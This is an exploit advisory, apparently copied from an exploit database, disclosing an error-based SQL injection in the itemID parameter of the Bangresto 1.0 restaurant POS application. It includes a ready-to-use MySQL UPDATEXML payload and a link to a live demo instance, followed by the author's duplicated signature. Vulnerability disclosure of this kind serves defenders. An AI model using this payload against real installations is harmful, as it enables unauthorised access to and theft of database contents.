扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
## Exploit Title: Bangresto 1.0 - SQL Injection ## Exploit Author: nu11secur1ty ## Date: 12.16.2022 ## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html ## Demo: https://axcora.my.id/bangrestoapp/start.php ## Software: https://github.com/mesinkasir/bangresto ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto ## Description: The <code>itemID</code> parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the itemID parameter, and a database error message was returned. The attacker can be stooling all information from the database of this application. ## STATUS: CRITICAL Vulnerability [+] Payload: </code><code>MySQL --- Parameter: itemID (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 --- </code><code> ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto) ## Proof and Exploit: [href](https://streamable.com/moapnd) ## Time spent 00:30:00 System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> |
体验盒子
